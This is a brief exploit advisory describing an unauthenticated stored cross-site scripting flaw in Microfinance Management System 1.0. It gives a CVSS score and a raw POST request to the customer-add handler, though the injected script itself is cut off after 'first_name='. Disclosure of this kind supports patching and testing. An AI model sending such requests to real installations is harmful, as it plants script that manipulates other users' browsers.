Microfinance Management System 1.0 Cross Site Scripting – Torchsec
stored (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Version: 1.0
# Tested on: Linux
Title:
================
Microfinance Management System 1.0 - Cross-site scripting stored
(unauthenticated)
Summary:
================
Microfinance Management System version 1.0 is affected by the Cross-site
Scripting vulnerability due to poor hygiene in certain parameters. The
attacker could take advantage of this flaw to inject arbitrary javascript
code to manipulate the victim's browser capabilities.
Severity Level:
================
6.5 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Affected Product:
================
Microfinance Management System v1.0
Steps to Reproduce:
================
1. Open a request repeater (like Burp Suite) and send this request:
POST /mims/app/addcustomerHandler.php HTTP/1.1
Host: target.com
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://target.com/mims/addcustomer.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
customer_number=335341988&customer_type=14465108&first_name=
You can find your XSS payload in the /mims/managecustomer.php endpoint.
Gloss